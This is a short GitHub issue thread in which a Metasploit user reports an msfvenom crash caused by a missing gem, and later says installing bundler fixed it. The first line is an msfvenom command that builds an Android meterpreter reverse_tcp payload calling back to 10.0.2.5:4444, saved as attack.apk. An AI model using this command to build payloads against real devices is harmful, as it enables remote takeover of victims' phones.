### ISSUE TITLE
msfvenom is not creating payload

### ISSUE THREAD

**Issue by Vatsalvinit-17** [rapid7/metasploit-framework#15668]
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R > attack.apk
Traceback (most recent call last):
        25: from /usr/bin/msfvenom:472:in `<main>'
        24: from /usr/bin/msfvenom:67:in `framework'
        23: from /usr/bin/msfvenom:44:in `init_framework'
        22: from /usr/bin/msfvenom:27:in `require_deps'
        21: from /usr/lib/ruby/2.7.0/rubygems/core_ext/kernel_require.rb:83:in `require'
        20: from /usr/lib/ruby/2.7.0/rubygems/core_ext/kernel_require.rb:83:in `require'
        19: from /usr/share/metasploit-framework/lib/msfenv.rb:11:in `<top (required)>'
        18: from /usr/lib/ruby/2.7.0/rubygems/core_ext/kernel_require.rb:83:in `require'
        17: from /usr/lib/ruby/2.7.0/rubygems/core_ext/kernel_require.rb:83:in `require'
        16: from /usr/share/metasploit-framework/config/boot.rb:26:in `<top (required)>'
        15: from /usr/lib/ruby/2.7.0/rubygems/core_ext/kernel_require.rb:83:in `require'
        14: from /usr/lib/ruby/2.7.0/rubygems/core_ext/kernel_require.rb:83:in `require'
        13: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `<top (required)>'
        12: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:88:in `silence'
        11: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:136:in `with_level'
        10: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `block in <top (required)>'
         9: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler.rb:149:in `setup'
         8: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/runtime.rb:20:in `setup'
         7: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/runtime.rb:101:in `block in definition_method'
         6: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/definition.rb:226:in `requested_specs'
         5: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/definition.rb:237:in `specs_for'
         4: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/definition.rb:170:in `specs'
         3: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/spec_set.rb:78:in `materialize'
         2: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/spec_set.rb:21:in `for'
         1: from /usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/spec_set.rb:21:in `loop'
/usr/share/rubygems-integration/all/gems/bundler-2.1.4/lib/bundler/spec_set.rb:39:in `block in for': Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted? (Bundler::GemNotFound)

**Comment by Vatsalvinit-17** [comment]
issue resolved by installing bundler gem
